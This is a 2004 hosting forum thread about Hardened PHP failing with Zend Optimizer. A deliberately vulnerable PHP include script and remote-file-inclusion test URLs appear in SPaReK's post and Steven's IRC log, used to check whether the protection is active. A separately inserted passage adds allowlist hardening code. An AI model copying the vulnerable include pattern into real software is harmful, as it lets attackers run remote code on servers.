Web Hosting Talk
Thread: Zend Optimizer and Hardened PHP


TabKey
12-19-2004, 12:32 PM
I am having trouble compiling PHP 4.3.10 with the new Hardened PHP if I have the Zend Optimizer (2.5.7) installed. It looks like the two may be incompatible. My question is, what do most hosts do? Do they install Zend Optimizer and not Hardened PHP, or install Hardened PHP and not Zend Optimizer? Are there any other alternatives? And forgive me if I am wrong and Zend Optimizer and Hardened PHP can both be installed.

Steven
12-19-2004, 01:09 PM
Zend Optimizer is not compatible with Hardened PHP.

eth00
12-19-2004, 01:09 PM
I have PHP 4.3.10 and Zend 2.5.7 installed on all of my servers and none of them had any trouble. Have you tried to upgrade PHP first, then upgrade Zend second? They both should work together fine.

*edit* sorry I did not read it all the way, normal 4.3.10 works fine though.

Sheps
12-19-2004, 05:49 PM
Dump Hardened PHP like a sack of potatoes if you are a host. If it is a choice between the very little security Hardened PHP gives you and the things Zend can do, it should be very easy to decide.

Plus, other ways exist to secure the server against what Hardened PHP protects.

bilalk
12-19-2004, 06:13 PM
The only thing Zend Optimizer really does for you as a shared host is decoding Zend encoded applications.

The script optimizations it makes give a negligible performance benefit for most PHP scripts.

That said - if you need Zend Optimizer (ie. for ModernBill, or another Zend-encoded application), then you shouldn't bother with Hardened-PHP.

Sheps
12-19-2004, 06:34 PM
A lot of software that hosts use depends on Zend. ModernBill for one. A lot of my clients also need Zend for the decoding, though, and they are not hosts.

That said, try upgrading to the latest Zend first. Might be a problem with that, since PHP 4.3.10 does have problems. ;)

Steven
12-19-2004, 06:52 PM
Hardened PHP will segfault PHP if Zend is installed, so it's not a problem with Zend's version.

dynamicnet
12-19-2004, 07:40 PM
Greetings:

We've been using hardened PHP and Zend for several PHP versions including 4.3.10 (we upgraded Zend to the latest prior to the 4.3.10 move).

So far, we've had no segmentation faults or other problems.

Thank you.

Steven
12-19-2004, 07:50 PM
dynamicnet,
I do not believe it...

http://sourceforge.net/forum/forum.php?thread_id=1087785&forum_id=368088
http://www.zend.com/phorum/read.php?num=5&id=2958&thread=2933

Some proof...

dynamicnet
12-19-2004, 08:01 PM
Greetings Steve:

I didn't post for you to believe or to disbelieve.

As stated, we've been running both for some time; and yesterday, I just upgraded several servers from PHP 4.3.9 (with hardened PHP, with ZendOptimizer) to 4.3.10 (with hardened PHP and the latest Zend).

Whenever we do such upgrades, we test a variety of PHP-based applications; and so far, everything works.

Thank you.

Steven
12-19-2004, 08:13 PM
before Zend:

root@w00t [~]# php -v
PHP 4.3.10 (cli) (built: Dec 19 2004 16:07:08)
Copyright (c) 1997-2004 The PHP Group
Zend Engine v1.3.0, Copyright (c) 1998-2004 Zend Technologies
root@w00t [~]#


OK, let's install Zend:

root@w00t [~]# tail -n 6 /usr/local/lib/php.ini
[Zend]
zend_optimizer.optimization_level=15
zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-2.5.7
zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-2.5.7
zend_extension=/usr/local/Zend/lib/ZendExtensionManager.so
zend_extension_ts=/usr/local/Zend/lib/ZendExtensionManager_TS.so
root@w00t [~]#

Now let's see if PHP segfaults!

Uh oh!?!:

root@w00t [~]# php -v
Segmentation fault (core dumped)
root@w00t [~]#

Hmm, so it works OK? I don't think so...

Let's do some investigation with strace. I ran strace -f php -v and at the end it says:

sigprocmask(SIG_BLOCK, ~[ILL TRAP ABRT EMT FPE BUS SEGV SYS], []) = 0
open("/usr/local/Zend/lib/ZendExtensionManager.so", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=7724, ...}) = 0
read(3, "\177ELF\1\1\1\tFreeBSD\0\3\0\3\0\1\0\0\0\270\10\0\0004"..., 4096) = 4096
mmap(0, 12288, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_NOCORE, 3, 0) = 0x287dd000
mprotect(0x287de000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mprotect(0x287de000, 4096, PROT_READ|PROT_EXEC) = 0
mmap(0x287df000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x1000) = 0x287df000
close(3) = 0
access("/usr/lib/libm.so.2", F_OK) = 0
mmap(0, 400, PROT_READ|PROT_WRITE, MAP_ANON, -1, 0) = 0x287e0000
munmap(0x287e0000, 400) = 0
sigprocmask(SIG_SETMASK, [], NULL) = 0
sigprocmask(SIG_BLOCK, ~[ILL TRAP ABRT EMT FPE BUS SEGV SYS], []) = 0
sigprocmask(SIG_SETMASK, [], NULL) = 0
stat("/usr/local/Zend/lib/Optimizer-2.5.7/php-4.3.x/ZendOptimizer.so", {st_mode=S_IFREG|0755, st_size=551576, ...}) = 0
sigprocmask(SIG_BLOCK, ~[ILL TRAP ABRT EMT FPE BUS SEGV SYS], []) = 0
mmap(0, 36864, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0) = 0x287e0000
open("/usr/local/Zend/lib/Optimizer-2.5.7/php-4.3.x/ZendOptimizer.so", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=551576, ...}) = 0
read(3, "\177ELF\1\1\1\tFreeBSD\0\3\0\3\0\1\0\0\0\240y\1\0004\0"..., 4096) = 4096
mmap(0, 557056, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_NOCORE, 3, 0) = 0x287e9000
mprotect(0x28864000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mprotect(0x28864000, 4096, PROT_READ|PROT_EXEC) = 0
mmap(0x28865000, 40960, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x7b000) = 0x28865000
mmap(0x2886f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0x2886f000
close(3) = 0
access("/usr/lib/libm.so.2", F_OK) = 0
mprotect(0x287e9000, 507904, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mmap(0, 1968, PROT_READ|PROT_WRITE, MAP_ANON, -1, 0) = 0x28871000
munmap(0x28871000, 1968) = 0
mprotect(0x287e9000, 507904, PROT_READ|PROT_EXEC) = 0
sigprocmask(SIG_SETMASK, [], NULL) = 0
sigprocmask(SIG_BLOCK, ~[ILL TRAP ABRT EMT FPE BUS SEGV SYS], []) = 0
sigprocmask(SIG_SETMASK, [], NULL) = 0
--- SIGSEGV (Segmentation fault) ---
--- SIGSEGV (Segmentation fault) ---

I know you are still going to deny it, but I don't care... just feel good leading people on with inaccurate information.

BTW, here's the server info:

Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7e Hardened-PHP/4.3.10

dynamicnet
12-19-2004, 08:37 PM
Greetings Steve:

As stated, you can believe what you want to believe.

Thank you.

perldrops
12-19-2004, 08:38 PM
OK children... enough of the arguing... lol

Steven
12-19-2004, 08:43 PM
Originally posted by dynamicnet
Greetings Steve:

As stated, you can believe what you want to believe.

Thank you.


I love how you can deny everything when solid facts are given to you... Even the Zend developers said it will not work, and yet you say it does... It sounds like you got into a hole saying it worked and then can't dig yourself out...

*cough*
http://www.zend.com/phorum/read.php?num=5&id=2958&thread=2933


The problem is that Hardened PHP changes Zend structures, which makes patched PHP not binary compatible with original PHP. This is why Zend products do not work with Hardened PHP. I don't think it is possible to do something except making a separate Optimizer build for Hardened PHP - or convincing the Hardened PHP makers to make it binary compatible with plain PHP. If you need details on how it isn't compatible - please ask, I'll explain.

IGobyTerry
12-19-2004, 08:45 PM
DynamicNet,

Do you have anything to show that it is working? From the various sources that I've heard, it doesn't work with Zend. I haven't tried it out myself, as I haven't seen a need to, with the masses saying it doesn't work.

LP-Trel
12-19-2004, 08:46 PM
Originally posted by dynamicnet
Greetings Steve:

I didn't post for you to believe or to disbelieve.

As stated, we've been running both for some time; and yesterday, I just upgraded several servers from PHP 4.3.9 (with hardened PHP, with ZendOptimizer) to 4.3.10 (with hardened PHP and the latest Zend).

Whenever we do such upgrades, we test a variety of PHP-based applications; and so far, everything works.

Thank you.

Hi dynamicnet,

I've been a Hardened-PHP user for some months now since I discovered the patchset when PHP was at 4.3.6/4.3.7 and I have yet to be able to get it to work with Zend Optimizer.

The threads in those forums that Steve posted above were mine, asking the authors of both products if the two products were compatible. The authors of both have told me no after their own investigations. According to both, the modifications to PHP in the Hardened-PHP patch cause the binary structure to change, and since Zend Optimizer circumvents the API of PHP, it segfaults.

For the authors of the products and my own benefit, could you detail the process by which you got them to work?

Thank you.

dynamicnet
12-20-2004, 07:54 AM
Greetings:

See http://www.zend.com/phorum/read.php?num=5&id=3479&thread=2933

Thank you.

SPaReK
12-20-2004, 11:14 AM
It looks like this compiles, but the security settings of Hardened PHP do not hold. I tried this on two servers: one that had Hardened PHP compiled in with PHP and no Zend Optimizer, the other using the instructions from the above link.

Create a file on an account (for this I used a third, independent server). I called this file vul.php:


<?php
print("Hello");
?>


Now on each server create a file (I called vuln.php):


<?php
include $_REQUEST['aktion'];
?>


Now, going to the server that just has Hardened PHP compiled in and no Zend Optimizer:

http://server1.com/vuln.php?aktion=http://3rdserver.com/vul.php

I get a blank page, which according to the Hardened PHP documentation is what I should get.

Now go to the other server, that has both Zend Optimizer and Hardened PHP installed per the instructions above:

http://server2.com/vuln.php?aktion=http://3rdserver.com/vul.php

and I get a page that says "Hello", which seems to indicate that Hardened PHP is not installed.

Perhaps I did something wrong; I invite others to try this and let me know if it works for you.
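The vuln.php test above passes a caller-controlled value straight to include, which is exactly the pattern Hardened PHP's include protection is meant to catch. Because a build where the patch did not take (as on server2 above) offers no such protection, the script itself should not depend on it. The following is an added example, not SPaReK's or dynamicnet's code: the request selects a page name from a fixed allowlist and the script composes the path itself, so a URL, a "../" sequence or a stream wrapper never reaches include. The ./pages/ directory, the page names and the aktion parameter are assumptions; the code is written to stay compatible with the PHP 4 era of the thread.

```php
<?php
// Added example (not from the thread). Replaces `include $_REQUEST['aktion'];`
// with an allowlisted lookup so the request can choose a page but never build a path.

// Assumed layout: includable fragments live in ./pages/ as <name>.php.
$page_dir = dirname(__FILE__) . '/pages';
$allowed_pages = array('home', 'about', 'contact');   // assumed page names

// Returns the absolute path of the page to include, or null if the request is rejected.
function resolve_page($requested, $allowed, $dir)
{
    // Only a plain token may pass: no slashes, dots, colons, NUL bytes or trailing
    // newline (\z, not $, so "home\n" is rejected too).
    if (!preg_match('/^[a-z0-9_-]+\z/', $requested)) {
        return null;
    }
    // Strict allowlist match; the request selects a name, it never composes a path.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    $real_dir = realpath($dir);
    $real = realpath($dir . '/' . $requested . '.php');
    // The resolved file must exist and sit inside the page directory.
    if ($real === false || $real_dir === false
        || strncmp($real, $real_dir . DIRECTORY_SEPARATOR, strlen($real_dir) + 1) !== 0) {
        return null;
    }
    return $real;
}

$requested = isset($_REQUEST['aktion']) ? (string) $_REQUEST['aktion'] : 'home';
$file = resolve_page($requested, $allowed_pages, $page_dir);
if ($file === null) {
    // Reject rather than fall back to the raw value; a remote URL such as
    // http://3rdserver.com/vul.php fails the token check before any I/O happens.
    header('HTTP/1.0 404 Not Found');
    exit('Unknown page');
}
include $file;
```

With this in place, the request from the test above (aktion=http://3rdserver.com/vul.php) fails the token check and returns 404 on both servers, regardless of whether the Hardened PHP include protection was compiled in. It complements, rather than replaces, keeping allow_url_fopen off in php.ini.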

Steven
12-20-2004, 01:34 PM
Originally posted by dynamicnet
Greetings:

See http://www.zend.com/phorum/read.php?num=5&id=3479&thread=2933

Thank you.


Yes, but please justify your PHP 4.3.9 comment...


I just upgraded several servers from PHP 4.3.9 (with hardened PHP, with ZendOptimizer)


That posting speaks of nothing but 4.3.10.


And according to the other poster, the security features do not hold... please explain that also.

BeenThereDoneThat
12-20-2004, 02:36 PM
Originally posted by dynamicnet
Greetings Steve:

As stated, you can believe what you want to believe.

Thank you.

LMAO......:evilb: :banana: :clap:

dynamicnet
12-20-2004, 03:15 PM
Greetings Steve:

"I just upgraded several servers from PHP 4.3.9 (with hardened PHP, with ZendOptimizer)"

Yes, from 4.3.9 (which was using Hardened PHP and Zend) to 4.3.10.

4.3.9 was upgraded from 4.3.8 (which was also using Hardened PHP and Zend).

Thank you.

Steven
12-20-2004, 03:17 PM
Originally posted by dynamicnet
Greetings Steve:

"I just upgraded several servers from PHP 4.3.9 (with hardened PHP, with ZendOptimizer)"

Yes, from 4.3.9 (which was using Hardened PHP and Zend) to 4.3.10.

4.3.9 was upgraded from 4.3.8 (which was also using Hardened PHP and Zend).

Thank you.

OK, can you explain the security functions not working, as SPaReK has posted? I will test it shortly to back up his statements.

Steven
12-20-2004, 03:28 PM
I can now verify what SPaReK said is true. You defeat the security purpose.

David
12-20-2004, 03:33 PM
Hm..

Really all that's left to say... pwned.

//Keep on going, this is getting amusing. :cartman:

Steven
12-20-2004, 03:46 PM
Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7e Hardened-PHP/4.3.10

But let's see here (normal way + no Zend, since it segfaults):

[11:37] <steve|> ok guys
[11:37] <steve|> http://rack911.com/vuln2.php?aktion=http://www.rack911.com/vuln.php
[11:37] <smartass> http://tinyurl.com/5r6de (at rack911.com)
[11:37] <steve|> what comes up
[11:37] <steve|> blank page?
[11:37] <fac3less> pics of naked steve
[11:37] <steve|> come on
[11:37] <fac3less> blank
[11:37] <steve|> ok
[11:37] <fac3less> yep, blank php
[11:37] <fac3less> <html><body></body></html>
[11:38] <steve|> ok cool
[11:38] <steve|> thats hardened php enabled
[11:38] <steve|> lets do it dynamicnets way
[11:38] <steve|> and check it

OK, dynamicnet's way:

[11:41] <steve|> http://rack911.com/vuln2.php?aktion=http://www.rack911.com/vuln.php
[11:41] <smartass> http://tinyurl.com/5r6de (at rack911.com)
[11:41] <steve|> what happens
[11:41] <fac3less> and he'll complain about it later tonight
[11:41] <fac3less> Hello
[11:42] <steve|> hbaha
[11:42] <steve|> BOOO YAAAA
[11:42] <nickn> haha
[11:42] <steve|> busted
[11:42] * steve| loves himself


OK dynamicnet, here's the problem with your way... Just because you patch it after it is configured does not mean Hardened PHP is enabled, because the patch adds special functions to the configure script:

server1# ./configure --help | grep hard
--disable-hardened-php-mm-protect Disable the Memory Manager protection.
--disable-hardened-php-ll-protect Disable the Linked List protection.
--disable-hardened-php-inc-protect Disable include/require protection.
--disable-hardened-php-fmt-protect Disable format string protection.
--disable-hardened-php-hash-protect Disable Zend HashTable DTOR protection.
server1#

All of those features are disabled by default, since you do not run the configure script AFTER it's already patched; you run it before.

Oh, and I know you are going to deny it... so don't even post, pls.

dynamicnet
12-20-2004, 03:57 PM
Greetings Steve:

http://www.webhostingtalk.com/showthread.php?s=&threadid=351313&perpage=15&highlight=rack911&pagenumber=3 makes me wonder.


But I will take your word you are correct on the Zend issue.

Thank you.

Steven
12-20-2004, 03:59 PM
Originally posted by dynamicnet
Greetings Steve:

http://www.webhostingtalk.com/showthread.php?s=&threadid=351313&perpage=15&highlight=rack911&pagenumber=3 makes me wonder.


But I will take your word you are correct on the Zend issue.

Thank you.

Greetings,

Why bring up a post totally unrelated??! Because we showed you were wrong? And you got mad? So now you are going to rub something in my face?? That's fun... I just hope all your clients you installed Hardened PHP on their server for know you just gave them a false sense of security... sad.

Thank you.

nickn
12-20-2004, 04:04 PM
Originally posted by dynamicnet
Greetings Steve:

http://www.webhostingtalk.com/showthread.php?s=&threadid=351313&perpage=15&highlight=rack911&pagenumber=3 makes me wonder.


But I will take your word you are correct on the Zend issue.

Thank you.

This is hardly necessary or on topic. Can we all act like adults? :rolleyes:

dynamicnet
12-20-2004, 04:23 PM
Greetings Nickn:

Out of curiosity, are you the same Nickn on the following?

[11:42] <nickn> haha
[11:42] <steve|> busted
[11:42] * steve| loves himself

You are right, Steve was right, and I am wrong.

Steve, I apologize. I sometimes have trouble with arrogance or tones of arrogance. My response was not necessary.

Lesson learned.

Thank you.

Steven
12-20-2004, 04:25 PM
Apology accepted, dynamicnet.

nickn
12-20-2004, 04:26 PM
Originally posted by dynamicnet
Greetings Nickn:

Out of curiosity, are you the same Nickn on the following?

[11:42] <nickn> haha
[11:42] <steve|> busted
[11:42] * steve| loves himself

You are right, Steve was right, and I am wrong.

Steve, I apologize. I sometimes have trouble with arrogance or tones of arrogance. My response was not necessary.

Lesson learned.

Thank you.

How was I right? I'm not even taking part in this whole discussion... I'm simply stating that bringing in other threads is very childish and not like you.

Actually - that comment was made in #cpanel (with 80 other people) and it wasn't regarding whatever situation is happening here... notice I said all and not just you. However, you were the one who started bringing in random threads completely off-topic. :)

dynamicnet
12-20-2004, 04:29 PM
Greetings NickN:

As I stated, I was wrong.

Thank you.